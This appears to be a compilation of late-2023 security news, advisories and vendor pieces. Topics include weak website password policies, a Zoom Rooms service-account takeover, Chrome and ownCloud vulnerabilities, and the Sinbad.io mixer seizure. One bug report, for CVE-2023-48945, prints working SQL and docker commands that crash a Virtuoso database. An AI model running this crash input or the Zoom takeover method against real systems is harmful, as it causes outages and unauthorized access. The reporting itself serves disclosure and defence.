PRESS RELEASE

EAST BRUNSWICK, N.J., Nov. 29, 2023 -- 1Kosmos, the company that unifies identity proofing and passwordless authentication, today announced the 1Kosmos BlockID platform now enables organizations to seamlessly extend web-based identity proofing sessions to a user's mobile device for scanning government issued documents. 

This new capability does not require a mobile application, and creates a frictionless web user journey by eliminating the need for a separate application to capture identity documents and meet identity assurance level (IAL) requirements. Unique to 1Kosmos is the use of a privacy by design architecture where personal information is accessible only upon user consent.

To enable fast and easy identity proofing from the web, without downloading a mobile application, 1Kosmos BlockID connects a browser to a session accessing the camera on a user's mobile device for document verification. It also validates the authenticity of government identity documents with issuing authorities and triangulates personal data from driver’s licenses, passports, national IDs, and more. In addition, 1Kosmos BlockID challenges the user to take a live selfie to ensure they are a real person and matches their selfie with the images scanned from the documents. 

“Traditional identity verification journeys performed on the web require users to install a mobile app for scanning government issued documents,” said Huzefa Olia, Co-Founder and COO for 1Kosmos. “For organizations that prefer an app-less experience, 1Kosmos BlockID eliminates the need for a dedicated app, while providing the flexibility to embed and customize document-based identity proofing across different platforms and end user journeys to suit their identity assurance and security requirements.” 

Cross Platform Identity Proofing

Like the 1Kosmos mobile app, the new app-less web based identity verification capabilities enable users to capture high quality images of government issued documents through mobile devices. 1Kosmos BlockID provides the following capabilities and benefits for implementing identity verification journeys across platforms:

*   Creates separate “verification sessions” for identity proofing with any type of document including driver’s license, passport, National ID and more
    
*   Provides a standalone web client that can extract identity data and validate the authenticity of the document template 
    
*   Offers an interface to define risk thresholds for decisioning on liveness, selfie match, etc. 
    
*   Supports integration with third party providers to validate authenticity of documents and data 
    
*   Enables administrators to review the result from the extraction of documents and data along with a recommendation from 1Kosmos on the status of verification (i.e., Pass or Fail) 
    
*   Enables organizations to build custom user verification journeys via the 1Kosmos control plane
    
*   Provides pre-deployment testing via proofing URLs
    
*   Includes built-in support for internationalization 
    
*   Meets W3C Web Content Accessibility Guidelines
    

Availability

The unified web and mobile identity verification capabilities are available immediately in the 1Kosmos BlockID platform.  

About 1Kosmos BlockID

The 1Kosmos BlockID platform verifies user identity for straight-through onboarding of customers, workers and citizens. It creates a reusable digital wallet for high assurance authentication into digital services and instant validation of end-user qualifications, competencies, authority, and more. A unique privacy-by-design architecture centered around a private and permissioned blockchain eliminates centralized honeypots of end user personal identifiable information (PII), simplifying compliance to privacy mandates such as GDPR and providing organizations tamper evident verification to always know the identity behind devices accessing applications, data and services. BlockID has attained certification to NIST 800-63-3 and UKDAIF via Kantara, FIDO2 and iBeta’s PAD Level 2 guidelines. It is delivered as a stand alone or embedded cloud service or via a managed service as a Credential Service Provider for residents.

About 1Kosmos

1Kosmos enables remote identity verification and passwordless multi-factor authentication for workers, customers and residents to securely transact with digital services. By unifying identity proofing, credential verification and strong authentication, the BlockID platform prevents identity impersonation, account takeover and fraud while delivering frictionless user experiences and preserving the privacy of users’ personal information. BlockID performs millions of authentications daily for government agencies and some of the largest banks, telecommunications, higher education and healthcare organizations in the world. The company is funded by Forgepoint Capital and Gula Tech Adventures with headquarters in East Brunswick, New Jersey. For more information, visit www.1kosmos.com and follow us  on X and LinkedIn.

1Kosmos Unifies Identity Verification User Journeys Across Web and Mobile Platforms

A new study that looked at the password requirements of the most popular websites came to a disappointing but not surprising conclusion.

A new study that examines the current state of password policies across the internet shows that many of the most popular websites allow users to create weak passwords.

For the Georgia Tech study, the researchers designed an algorithm that automatically determined a website’s password policy. With the help of machine learning, they could see the consistency of length requirements and restrictions for numbers, upper- and lower-case letters, special symbols, combinations, and starting letters. They could also see if sites permitted dictionary words or known breached passwords.

Using this tool they found:

*   12% of the websites they looked at completely lack password length requirements
*   3 out of 4 fail to meet minimum requirement standards which means they:
    
    *   Allow very short passwords
    
    *   Do not block common passwords
    
    *   Use outdated requirements like complex characters

More than half of the websites in the study accepted passwords with six characters or less, with 75% failing to require the recommended eight-character minimum. Around 12% of the websites had no length requirements, and 30% did not support spaces or special characters.

Giving users that kind of freedom is asking for them to be duped. As we pointed out a while back, even tech-savvy users like IT administrators resort to awful passwords when given the chance.

The reasons for not enforcing standards are obvious. Most websites care more about customer satisfaction than security, and you can guess which one is better for business.

Users don’t like passwords, especially since the password situation has been made worse by ridiculous and unnecessary rules, such as asking users to pick passwords that follow formulas, or forcing users to change their password every few months. Both rules have been discredited but continue to haunt us. Formulas reduce the number of possible passwords a user can pick from, and regular password resets encourage users to pick passwords that conform to a predictable pattern, both of which can make guessing passwords easier, which is the opposite of what we want.

If you’d like to read more about this, read “Why (almost) everything we told you about passwords was wrong.” The article summarizes how a lot of what you’ve been told about passwords over the years was either wrong (change your passwords as often as your underwear), misguided (choose long, complicated passwords), or counterproductive (don’t reuse passwords).

We feel that we should entirely move away from the model that requires users to create and remember passwords. It is time for something more secure AND user-friendly. And it’s not like these systems don’t exist (hello Passkeys), we just need to embrace them more widely.

Let’s enable muti-factor authentication (MFA) where we can, even if we feel that using a password as the first factor doesn’t add a lot of extra security to the login procedure. And if we need to rely on passwords alone, try using a password manager. They help you create complex passwords and remember them for you.

The full report of the researchers will be presented at the ACM Conference on Computer and Communications Security (CCS) in Copenhagen, Denmark, later this month.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 Many major websites allow users to have weak passwords 

By Waqas
A critical Zoom Room vulnerability allowed exploiting service accounts for unauthorized tenant access.
This is a post from HackRead.com Read the original post: Zoom Vulnerability Allowed Hackers to Take Over Meetings, Steal Data

The Zoom vulnerability was originally discovered in June 2023. Despite the discovery being made earlier, the details were only publicly disclosed on November 28, 2023.

Zoom Rooms, the cloud-based video conferencing platform by **Zoom**, is making headlines due to a recently discovered vulnerability. This flaw poses a significant security risk as it enables attackers to seize control of a Zoom Room’s service account, gaining unauthorized access to the victim organization’s tenant.

Exploiting this Zoom vulnerability allows attackers to hijack meetings, manipulate the Contacts feature, infiltrate organization-wide whiteboards, and extract sensitive data from Team Chat channels, even without an invitation. What’s particularly concerning is that these actions can be carried out without detection.

In June 2023, a researcher at AppOmn discovered a vulnerability in Zoom Rooms during HackerOne’s live hacking event, **H1-4420**, where Zoom was a participating company. Despite the discovery being made earlier, the details were only publicly disclosed on November 28, 2023.

In a **blog post** shared with Hackread.com ahead of its scheduled publication on Tuesday, Ciarán Cotter from AppOmni outlined that once attackers gain access to an organization’s tenant, they can infiltrate confidential data shared within Team Chat, Whiteboards, and other Zoom applications.

For your information, **Zoom Rooms** allow team members from different physical locations to collaborate over Zoom. To set it up, the Zoom Rooms app must be installed on a device, such as an iPad. It serves as a terminal for everyone in the room. This device is of critical importance as it attends the meetings on behalf of all. 

When a user creates a Zoom Room, their service account is automatically created with licenses for Whiteboards and Meetings. These accounts possess extensive access within the tenant because of their function as regular team members. 

Exploiting the Zoom vulnerability enabled attackers to predict service account email addresses, hijack the accounts, and collect sensitive information. The issue arose because the Zoom Rooms service account ID was directly inherited from the user with the Owner role in the tenant during the account creation process.

This flaw meant that being in the same meeting as a Zoom Room and messaging it on Team Chat could expose the entire email address, given that it followed the format:  **rooms_<account ID>@companydomain.com.** 

With this information, attackers could create an arbitrary Outlook email address that matches the format: **room__<account ID>@outlook.com** and use it to follow the Zoom sign-up flow. They would receive the activation link sent to the Zoom Room’s email address. With the control of the email inbox, they can click the link and activate the account.

The issue was further intensified by the fact that service accounts couldn’t be removed from Team Chat channels. However, there’s nothing to be wary of as Zoom has addressed this vulnerability by removing the ability to activate Zoom Room accounts. This prevents threat actors from exploiting this predictable email format and claiming unauthorized access to Zoom room service accounts.

Still, this finding highlights the potential misuse of service accounts to gain unauthorized access to **SaaS** systems. Service accounts are frequently used by third-party applications to access SaaS data. Therefore, safeguarding these applications and service accounts is critical for maintaining a robust SaaS security posture.

****_RELATED ARTICLES_****

1.  Zoom Phishing Scam Steals Microsoft Exchange Credentials
2.  Fake Zoom installers infect PCs with RevCode WebMonitor RAT
3.  Zoom web client flaw could’ve let hackers crack meetings passcode
4.  Zoom adds Two-factor authentication (2FA) as extra layer of security
5.  Fake Zoom meeting invite phishing scam harvests Microsoft credentials
6.  ‘Zoom account suspended’ phishing scam aims at Office 365 credentials

Zoom Vulnerability Allowed Hackers to Take Over Meetings, Steal Data

A stack overflow in openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.

The PoC is generated by my DBMS fuzzer.

CREATE TABLE v0 ( v1 DECIMAL ) ; 
  INSERT INTO v0 VALUES ( 0 ) ; 
  INSERT INTO v0 ( v1 ) SELECT CASE v1 WHEN 49 THEN v1 ELSE \-128 END FROM v0 AS v2 , v0 , v0 AS v3 GROUP BY v1 , v1 ; 
  UPDATE v0 SET v1 \= ( SELECT DISTINCT \* FROM v0 ) ; 

Server Log:

    14:21:24 HTTP/WebDAV server online at 8890
    14:21:24 Server online at 1111 (pid 1)
    *** stack smashing detected ***: terminated
    

Due to the stack smashing, I failed to retrieve the correct backtrace.

ways to reproduce (write poc to the file '/tmp/test.sql' first):

# remove the old one
docker container rm virtdb\_test -f
# start virtuoso through docker
docker run --name virtdb\_test -itd --env DBA\_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.11
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb\_test isql 1111 dba
# run the poc
cat /tmp/test.sql | docker exec -i virtdb\_test isql 1111 dba

CVE-2023-48945: Fuzzer: Virtuoso 7.2.11 crashed by stack smashing · Issue #1172 · openlink/virtuoso-opensource

The vulnerability is among a rapidly growing number of zero-day bugs that major browser vendors have reported recently.

Source: PREMIO STOCK via Shutterstock

For the fourth time since August, Google has disclosed a bug in its Chrome browser technology that attackers were actively exploiting in the wild before the company had a fix for it.

**Integer Overflow Bug**

The latest zero-day, which Google is tracking as CVE-2023-6345, stems from an integer overflow issue in Skia, an open source 2D graphic library in Chrome. The bug is one of seven Chrome vulnerabilities for which Google issued a security update this week.

The company's advisory contained sparse details on CVE-2023-6345 beyond mentioning the fact that an exploit for it is publicly available. A brief description on NIST's National Vulnerability Database (NVD) site described the flaw as affecting versions of Chrome prior to 119.0.6045.199 and allowing a remote attacker who has "compromised the renderer process to potentially perform a sandbox escape via a malicious file." The NVD identified the bug as a high-severity issue.

Google credited researchers at its Threat Analysis Group for finding and reporting CVE-2023-6345 on Nov. 24.

The vulnerability is the seventh zero-day that Google has rushed to patch amid active exploit activity this year and is the latest manifestation of growing attacker interest in Chrome and other browsers.

**A Flood of Browser Zero-Days**

Since the beginning of this year, Apple, Google, Microsoft, and Firefox have all disclosed multiple critical vulnerabilities in their respective browsers, including a handful of zero-days. In some instances, a bug in some widely used component affected multiple browsers at once, as was the case with CVE-2023-4863, a zero-day heap overflow in WebP, a code library common to Chrome, Apple Safari, and Mozilla Firefox. In other instances, as with CVE-2023-5217, a zero-day bug in Chrome impacted multiple browsers based on Chromium technology, such as Microsoft Edge, Opera, Brave, and Vivaldi.

There were also multiple zero-days that Apple disclosed separately this year in its WebKit browser engine for Safari, including CVE-2023-28205 and three others in May: CVE-2023-32409, CVE-2023-28204, and CVE-2023-32373. Both Microsoft and Mozilla have also separately reported other critical bugs in their respective browsers.

It is unclear which threat actor might be currently exploiting CVE-2023-6345, the bug that Google disclosed this week, or why. But in recent months, Google and Apple have warned about vendors of commercial surveillance products exploiting zero-day bugs in their respective browser technologies to drop spyware on Android, iOS, and other mobile devices. Google discovered CVE-2023-4863 after researchers at Apple and Toronto University Citizen Lab informed the company about a commercial vendor using the flaw to drop Predator spyware on Android and iOS devices.

**Ubiquitous Use**

Much of the growing attacker interest in browsers has to do with their ubiquitous use, says Lionel Litty, chief security architect at Menlo Security. The exploding use of Web applications has resulted in users spending most of their time on browsers for everything from accessing applications and webpages to additional content such as PDFs and other documents. Adding to this is the drive by Google to integrate even more features into its browser and make it a replacement for fat client technologies, Litty says. This includes enabling access to USB devices, Bluetooth, and even the GPU through the WebGPU interface.

"Despite all the care taken by Google engineers, we continue to see a steady stream of security issues that are exploitable, including many zero-days that are actually exploited," he says.

The fact that multiple browsers are based on Chromium is another reason for attackers targeting the technology, Litty notes. "Developing an exploit against Chrome usually means that it will work against all browsers, save Safari and Firefox, allowing bad actors to target more victims without any additional work."

Saeed Abbasi, manager of vulnerability and threat research at Qualys, points to similar reasons for Chrome's growing popularity among threat actors. "Additionally, the high commercial value of exploiting a widely used platform like Chrome attracts sophisticated attackers, including those backed by state sponsors," he says.

More generally, browser vulnerabilities present significant risks for organizations, Abbasi says. Attackers can use browser bugs to sneak malware and spyware into an organization. Additionally, attackers might exploit these weaknesses to steal login credentials and other data for potential future attacks.

"To mitigate risks from browser vulnerabilities, organizations should prioritize regular updates and patch management to keep browsers up to date," Abbasi notes. "Implementing network segmentation can restrict browser access to sensitive areas, reducing breach impacts."

**About the Author(s)**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Google Patches Another Chrome Zero-Day as Browser Attacks Mount

October is a Content Management System (CMS) and web platform to assist with development workflow. A user with access to the media manager that stores SVG files could create a stored XSS attack against themselves and any other user with access to the media manager when SVG files are supported. This issue has been patched in version 3.5.2.

**Impact**

A user with access to the media manager that stores SVG files could create a stored XSS attack against themselves and any other user with access to the media manager when SVG files are supported.

SVG files are supported by default in v3 for convenience; however, this has resulted in multiple mistaken vulnerability reports from security researchers. As per the documentation, if a backend user is not trusted, the advice is to remove the svg extension from the list of supported file types.

**Patches**

The issue has been patched in v3.5.2 by including an SVG sanister. It is enabled by default for new installations but must be enabled for existing sites in the **config/media.php** file.

**Workarounds**

If you cannot upgrade for this patch, follow the pervious advice and remove svg from the supported file types.

**References**

*   https://github.com/octobercms/october/blob/3.x/config/media.php

Credits to:

*   Faris Krivic
*   Okan Kurtulus
*   Aldin Visnjic
*   Bug Shankar

**For more information**

If you have any questions or comments about this advisory:

*   Email us at hello@octobercms.com

CVE-2023-44383: Stored XSS by authenticated backend user with improper configuration

By Waqas
US Treasury Sanctions Sinbad.io for Laundering Millions in Stolen Funds Linked to North Korea's Lazarus Group.
This is a post from HackRead.com Read the original post: US Seizes Bitcoin Mixer Sinbad.io Used by Lazarus Group

According to the US government, Sinbad.io provided its services to the Lazarus group to launder money stolen from numerous data breaches, including those affecting Horizon Bridge, Axie Infinity, and Atomic Wallet.

The official domain of Sinbad.io, a popular Bitcoin “mixer” service has been seized by the United States government. The reason to seize the service given by the US Treasury is that the service apparently, was involved in laundering millions of dollars stolen by North Korean state-based notorious Lazarus group.

Those visiting Sinbad.io can now encounter a homepage uploaded by the government of the United States, announcing the following:

> _This service has been seized as part of a coordinated law-enforcement action between the Federal Bureau of Investigation, the Financial Intelligence and Investigation Service (FIOD), and the National Bureau of Investigation taken against the Sinbad.io cryptocurrency mixing service. The Federal Bureau of Investigation has seized the service in accordance with a seizure warrant pursuant to 18 U.S.C. 55 981 and 982 as part of a coordinated international law-enforcement operation._

In a press release dated November 29, 2023, the Treasury accused Sinbad.io of processing hundreds of millions of dollars worth of cryptocurrency obtained from various sources. These sources reportedly include large-scale data breaches, notably the $100 million hack affecting Horizon Bridge in June 2022, the $620 million from the Axie Infinity hack in March 2022, and the impact on customers of Atomic Wallet in June 2023.

What Sinbad.io’s homepage shows to visitors (Image credit: Hackread.com)

The US government further claimed that Sinbad.io is not only used for financial crimes but is also a tool employed by cybercriminals for “obfuscating transactions” associated with activities such as sanctions evasion, drug trafficking, purchasing child sexual abuse materials, and other illicit sales on dark web marketplaces.

The Lazarus group, operating under the control of the Democratic People’s Republic of Korea (DPRK), is infamous for its hacking activities. The US alleges that Sinbad.io serves as a “key money-laundering tool” for the already-sanctioned Lazarus group, which is believed to have stolen a staggering $2 billion worth of digital assets over its operational history.

According to the Q3 2023 Crypto Losses Report by Immunefi, a blockchain cybersecurity firm, the cryptocurrency industry incurred a loss of $685.5 million, marking the highest quarterly loss for the year.

The two largest exploits of the quarter were on Mixin Network and Multichain, which together accounted for 47.5% of all losses. The Lazarus Group, a North Korean state-sponsored hacking group, was responsible for $208.6 million in stolen funds, representing 30% of the total losses.

As for Sinbad.io, it operates on the Bitcoin blockchain and is considered by experts to be a successor to the previously sanctioned crypto mixer, Blender.io. The Office of Foreign Assets Control (OFAC) sanctioned Blender.io on May 6, 2022.

However, ddespite authorities shutting down the original Sinbad.io address, a mirrored site surfaced, registered in Moscow on November 18. A Google search for the original Sinbad.io now shows a copycat site, 1sinbadgo.com, as the second result. Notably, the copycat site, which also boasts a .Onion domain, claims to provide identical services to the original seized domain.

(Image credit: Hackread.com)

Nevertheless, the sanctions imposed by the US require the blocking and reporting of “all property and interests in property” belonging to Sinbad.io that are within the United States or under the possession or control of US persons, according to the press release.

****_RELATED ARTICLES_****

1.  **Lazarus Group uses KandyKorn macOS malware for crypto theft**
2.  **Lazarus APT Exploiting LinkedIn to Target Spanish Aerospace Firm**
3.  **Lazarus-Linked BlueNoroff APT Hits macOS with ObjCShellz Malware**
4.  **N. Korean Lazarus Group Suspected in $37.3M CoinsPaid Crypto Heist**
5.  **Hackers Used Fake LinkedIn Job Offer to Hack Off $625M from Axie Infinity**

US Seizes Bitcoin Mixer Sinbad.io Used by Lazarus Group

A vulnerability in the file server and collaboration platform earned a 10 in severity on the CVSS, allowing access to admin passwords, mail server credentials, and license keys.

Source: John Williams RF via Alamy Stock Photo

Hackers are actively exploiting a critical flaw in the open source ownCloud platform that allows access to access admin passwords, mail server credentials, and license keys, exposing their enterprise to data breaches or other types of malicious activity.

The flaw, tracked as CVE-2023-49103 and disclosed by ownCloud on Nov. 21, earned the top score of 10 out of 10 on the CVSS severity rating due to its ease of exploitation. It arises from a flaw in the "graphapi" app used in ownCloud, a file server and collaboration platform that enables secure storage, sharing, and synchronization of commonly sensitive files.

Researchers from GreyNoise observed what they characterized as "mass exploitation" of the flaw in the wild starting as early as Nov. 25, with at least 40 unique IP addresses seen trying to exploit the flaw so far, according to the current data shown on its tracker.

Glenn Thorpe, senior director of security research and detection engineering at GreyNoise, characterized the initial exploitation observed by GreyNoise as attackers "pretty much spraying it across the Internet to see what hits," in an online discussion on Tuesday.

The Shadowserver Foundation also is tracking exploitation of the flaw, having observed more than 11,000 exposed instances, with most of those located in Germany, the US, France, and Russia.

The app affected by the flaw is present in ownCloud versions 0.2.0 to 0.3.0. "This app utilizes a third-party library that will reveal sensitive PHP environment configurations, including passwords and keys," Thorpe wrote in the post.

It's important to note that only by patching can those affected mitigate the issue, as even disabling the app does not entirely resolve it, according to GreyNoise. The flaw affects both containerized and non-containerized ownCloud instances, although Docker containers from before February 2023 are not vulnerable to the credential disclosure, the researchers noted.

Moreover, the vulnerability is just one of three that ownCloud revealed last week, all of which allow attackers to breach data in deployments of the platform, the researchers noted. The other two are an authentication bypass flaw tracked as CVE-2023-49105 and a critical flaw related to the oauth2 app tracked as CVE-2023-49104.

"Organizations using ownCloud should address these vulnerabilities immediately," GreyNoise recommended.

**Top CVSS Rating**

OwnCloud is used by nearly 1 million organizations worldwide to manage and share data through a self-hosted platform, replacing the use of online services such as Dropbox to share files throughout an organization. Theoretically this makes enterprise file transfers more secure than sending them over a public cloud, except of course if the deployment of ownCloud is being exploited.

That's the current case of the critical flaw in graphapi, which relies on a third-party library that provides a URL which, when accessed, reveals the configuration details of the PHP environment, according to ownCloud.

These details include all the environment variables of the Web server, which in containerized deployments "may include sensitive data such as the ownCloud admin password, mail server credentials, and license key," according to ownCloud.

In its fix, ownCloud deleted the file owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php and disabled the phpinfo function docker-containers to remedy the flaw. The company also plans to harden various aspects in future core releases to mitigate similar vulnerabilities.

In addition to applying the fix, ownCloud also recommended that companies change the following secrets in their deployments: ownCloud admin password, mail server credentials, database credentials, and object-Store/S3 access-key.

**Other Flaws to Consider**

While not quite as severe as the graphapi flaw, the two other flaws recently discovered by ownCloud also are rated as critical and deserve attention, the company said.

CVE-2023-49105, rated as 9.8 on the CVSS, allows for attackers to access, modify, or delete any file without authentication if the username of the victim is known and the victim has no signing key configured, which is the platform's default configuration.

The flaw affects the ownCloud "core" app versions 10.6.0 – 10.13.0 and can be fixed by denying the use of pre-signed URLs if no signing key is configured for the owner of the files.

CVE-2023-49104, meanwhile, affects the ownCloud oauth2 app versions before 0.6.1 and allows someone to pass in a specially crafted redirect URL that bypasses the validation code. This, in turn, allows the attacker to redirect callbacks to an attacker-controlled top-level domain.

The flaw is rated as 9 on the CVSS and can be mitigated by hardening the validation code in the oauth2 app. A workaround that also fixes the flaw is to disable the "Allow Subdomains" option, according to ownCloud.

**About the Author(s)**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

Patch Now: Attackers Pummel Critical, Easy-to-Exploit OwnCloud Flaw

**Why is this Chrome CVE included in the Security Update Guide?**

The vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable.

**How can I see the version of the browser?**

1.  In your Microsoft Edge browser, click on the 3 dots (...) on the very right-hand side of the window
2.  Click on **Help and Feedback**
3.  Click on **About Microsoft Edge**

CVE-2023-6346: Chromium: CVE-2023-6346 Use after free in WebAudio

Guy Tytunovich, founder and CEO of CHEQ, says the days of a one-size-fits-all consent strategy are gone. Consider a two-pronged approach and use smart consent management technology to adapt to differing regulations.

Source: Formatoriginal via Alamy Stock Photo

COMMENTARY

Five years since the European Union's General Data Protection Regulation (GDPR) took effect, its fingerprints are everywhere: from proliferating privacy laws worldwide to the now-ubiquitous consent banners seen across websites of every kind. For multinational businesses, the GDPR isn't the only compliance hurdle on the horizon. Take, for example, the forthcoming enforcement of new privacy regulations like the California Privacy Rights Act (CPRA).

Businesses weren't ready for GDPR, and many still aren't. So, what now?

**The Consent-Compliance Gap: How Businesses Are Falling Short**

Data privacy awareness has increased among businesses since 2018, but many still struggle with compliance. The issue isn't just understanding the law but also enforcing it effectively. Many companies assume that simply using consent banners or consent management platforms (CMPs) ensures compliance. But all too often, these tools only provide an illusion of compliance, lacking crucial technical capabilities such as consent and preference enforcement.

The rapidly evolving patchwork of global and local privacy laws can also create confusing contradictions. Different jurisdictions have different requirements for obtaining and documenting consent. They may require different technical capabilities, such as real-time preference enforcement or the recognition of global opt-out preference signals. For example, the GDPR requires explicit consent, while other laws, such as the upcoming CPRA, accept implied consent in certain instances.

This leads to the consent-compliance gap. In this situation, businesses invest in and set up a consent tool, thinking they've fulfilled their compliance duties, yet they remain noncompliant in the eyes of the law.

**It's About to Get More Complicated**

In the five years since GDPR arrived, it's served as a model for data protection laws worldwide, inspiring legislation such as the California Consumer Privacy Act (CCPA), Brazil's General Data Protection Law, and China's Personal Information Protection Law (PIPL). Today, more than 130 nations have enacted privacy legislation, and in the United States, 12 states have enacted privacy laws, with six more in various stages of legislation.

In 2023 alone, four US privacy laws entered enforcement including The Virginia Consumer Data Protection Act (VCDPA), the Utah Consumer Privacy Act (UCPA), the Colorado Privacy Act (CPA), and the Connecticut Data Privacy Act (CTDPA). CPRA, an updated version of the CCPA, also entered partial enforcement this year. State-level privacy laws also passed in Delaware Indiana, Iowa, Montana, Oregon, and Texas.

These laws, while similar in many ways, have distinct requirements that make managing consent across jurisdictions even more complicated.

Here's where things get tricky. GDPR requires clear, affirmative consent. But the CPRA, CPA, and CTDPA don't necessarily need that "yes" from users before collecting data. Instead, it's enough to offer users an easy way to say "no." This "opt-out" model changes the game and makes crafting a one-size-fits-all consent strategy near impossible.

What does this mean for businesses that operate in multiple locations? They need to play by the toughest rules — the GDPR's "opt-in" — while also offering California users the "opt-out" choice. And let's not forget, it's not just about these two laws. With over 130 countries having their own privacy laws, businesses could face a whirlwind of different, sometimes conflicting, rules to follow.

This situation calls for a two-pronged solution. On the technical side, businesses need smart consent management technology that can adapt to different regulations. It should be able to serve specific consent banners based on user location, catering to the unique requirements of each region.

On the organizational side, there's a need for constant vigilance and updating. Privacy laws are evolving creatures, with changes and new regulations popping up regularly. Businesses must keep their fingers on the pulse of these changes and adapt their consent management practices accordingly.

In essence, navigating the maze of global privacy laws isn't just about knowing the rules. It's about having the right tools to applying these rules and the commitment to staying updated on the ever-changing landscape of data privacy laws.

**Compliance Is a Constant Effort in an Evolving Global Privacy Landscape**

For the first few years of the GDPR, enforcement actions were few and far between as regulators established precedents in the courts and codified the rules of the regulation. This led many businesses to take a "wait and see" approach to consent and cookie compliance or to do the bare minimum necessary to appear compliant. Today, that approach won't cut it.

As of June 2023, the EU regulators have handed out billions in fines, which relate directly to consent management. One of the largest GDPR fines to date, a €746 million (US$786 million) judgment against Amazon in July 2021, was brought down because the tech company had been using an implied consent model on its EU properties.

Meanwhile, consumer awareness and expectations around data privacy are on the rise. Some 62% of European consumers consider privacy a concern, according to an IAPP survey. Privacy is no longer a mere compliance issue; it's a cornerstone of brand reputation and customer trust. Businesses demonstrating a commitment to privacy can leverage it as a competitive advantage, attracting privacy-conscious consumers and fostering stronger customer relationships.

But to gain that trust, privacy and consent management cannot be a "set it and forget it" initiative; businesses must make a constant, conscious effort to meet evolving requirements and new technologies such as global privacy signals. Five years on, GDPR plays a key role in shaping this landscape, but it's just one piece of an increasingly complex puzzle.

**About the Author(s)**

Founder & CEO, CHEQ

Guy Tytunovich is the founder and CEO of CHEQ, the leader in Go-to-Market Security. Guy is a veteran of the Israeli Military cybersecurity and intelligence units and a founder of numerous tech companies in the space.

Tag

#web